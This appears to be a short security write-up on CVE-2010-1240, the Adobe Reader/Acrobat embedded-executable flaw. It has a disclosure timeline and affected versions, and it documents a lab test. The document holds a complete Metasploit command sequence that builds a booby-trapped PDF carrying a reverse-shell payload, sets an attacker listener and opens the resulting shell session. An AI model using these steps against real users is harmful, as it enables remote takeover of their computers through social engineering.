Timeline :

Vulnerability discovered & disclosed by Didier Stevens the 2010-03-29
Exploit-DB PoC provided by Didier Stevens the 2010-03-31

    PoC provided by :

jduck
Colin Ames

    Reference(s) :

CVE-2010-1240
EDB-ID-11987

    Affected version(s) :

Adobe Reader 9.3.2 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.3.2 and earlier versions for Windows and Macintosh4

    Tested on Windows XP SP3 with :

    Adobe Reader 9.3.0

    Description :

This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.

    Commands :

use exploit/windows/fileformat/adobe_pdf_emb­edded_exe
set OUTPUTPATH /home/eromang
set INFILENAME metasploit.pdf
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
expoit -j

sessions -i 1
dir